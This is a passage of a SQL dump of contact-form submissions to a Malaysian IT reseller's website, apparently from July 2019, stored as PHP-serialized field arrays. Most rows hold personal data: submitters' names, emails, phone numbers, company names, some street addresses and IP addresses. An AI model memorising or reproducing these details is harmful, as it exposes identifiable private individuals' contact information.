digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-01 10:27:39','115.132.227.212','1'),(214,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"Muni\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"munieyapen@leopad.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0182330200\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"Leopad\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:42:\"Looking for Digital Pointer for LCD/LED TV\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"19\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-02 12:40:59','175.139.228.217','1'),(215,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Willy Handoko\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"willyhandoko85@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"+628129639540\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Melati Jewellery\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:143:\"Need info price &amp; stock is ready stock or not (Zebra RFD8500 including Mobile Computer TC56), and (RFD2000, including mobile computer TC20)\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"78\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-03 00:18:51','125.161.252.214','1'),(216,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"Azmir Aziz\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"azmir@cryocord.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0386898888\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Cryocord Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:89:\"Suite 1-1, Bio X Centre, Persiaran Cyberpoint Selatan, Cyber 8, 63000 Cyberjaya, Selangor\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"Group Expansion Mics\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"50\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-03 10:30:44','211.24.85.46','1'),(217,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"nazrul hisyam\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"nazrul.hisyam@teamairballoon.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0133846434\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"Teamair balloon Sdn BHd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:44:\"Request quotation for sign up creative cloud\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-03 11:16:53','121.122.68.77','1'),(218,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"test\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"test@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:3:\"112\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"test\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"test\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-03 12:09:48','104.132.20.111','1'),(219,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"LOKMAN MHD ZAMRI\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"lokman.zamri@kopetro.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0145060074\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:37:\"Koperasi Kakitangan Petronas(KOPETRO)\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:71:\"B-3A-11, Megan Avenue II No.12, Jalan Yap Kwan Seng, 50450 Kuala Lumpur\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:83:\"Need video conferencing solution that can be integrated with Gotomeeting aplication\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"25\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-04 17:17:25','175.143.5.161','1'),(220,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Fazeela Yoosuf\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"info@sangutrade.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60182530184\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Sangu Trade Sdn. Bhd.\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:38:\"Looking for a prices of many products.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"40\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-04 22:24:03','111.221.54.106','1'),(221,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"Dr Seri Ayu Masuri Md Daud\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"seriayu@uitm.edu.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0145444505\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"Universiti Teknologi MARA\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:93:\"I need some advice on how to set up a meeting room equipped with a video conferencing system.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-05 11:27:44','202.58.95.7','1'),(222,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"hanny\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"procurementkl@renowarisan.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"012-5680239\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"Renowarisan Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:40:\"No.12A-1 (First Floor), Jalan PJS 8/12A,\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e 